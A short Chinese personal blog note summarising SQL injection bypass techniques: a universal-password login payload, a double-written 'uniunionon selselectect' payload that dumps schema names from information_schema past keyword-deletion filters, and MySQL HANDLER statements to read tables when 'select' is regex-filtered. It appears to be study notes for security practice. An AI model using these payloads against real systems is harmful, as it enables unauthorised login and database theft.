【SQL 笔记】绕过技术总结

SQL 笔记

仅为个人记录,菜是一定的 QAQ

万能密码篇

php

1
'or'1'='1

过滤篇

字符串过滤篇

删除性过滤

如果是只过滤字符串,那么最简单的绕过方法就是双写绕过,如过滤or union select

那么构造就要如下所示,这里以查库为例:

1
' uniunionon selselectect 1,2,group_concat(schema_name) from infoorrmation_schema.schemata#

正则过滤篇

过滤 select

mysql

正则过滤 select 的话,只能使用 handler 来进行绕过,语句如下:

1
2
handler table_name open;
handler table_name read first;

本文标题:【SQL 笔记】绕过技术总结

文章作者:binLep

发布时间:2020-02-24, 19:51:00

最后更新:2020-02-26, 22:12:32

原始链接:https://binlep.github.io/old_blog_01/2020/02/25/【SQL 笔记】绕过技术总结/

许可协议: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

文章目录
  1. 1. 万能密码篇
    1. 1.1. php
  2. 2. 过滤篇
    1. 2.1. 字符串过滤篇
      1. 2.1.1. 删除性过滤
    2. 2.2. 正则过滤篇
      1. 2.2.1. 过滤 select
        1. 2.2.1.1. mysql
|